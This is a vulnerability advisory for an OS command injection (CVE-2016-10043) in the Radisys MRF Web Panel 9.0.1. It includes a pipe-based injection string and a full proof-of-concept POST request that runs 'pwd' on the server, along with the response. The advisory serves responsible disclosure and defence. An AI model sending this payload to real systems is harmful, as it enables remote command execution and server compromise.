Title: MRF Web Panel OS Command Injection
Vendor: Radisys
Vendor Homepage: http://www.radisys.com
Product: MRF Web Panel (SWMS)
Version: 9.0.1
CVE: CVE-2016-10043
CWE: CWE-78
Risk Level: High
Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
COSMOTE (OTE Group) Information & Network Security
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
Proof Of Concept:
1. Login to the vulnerable MRF web panel (with a standard user account):
https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
4. Check the output of the injected command 'pwd' in the response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
/var/opt/swms/www/html
Vulnerability Impact:
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followed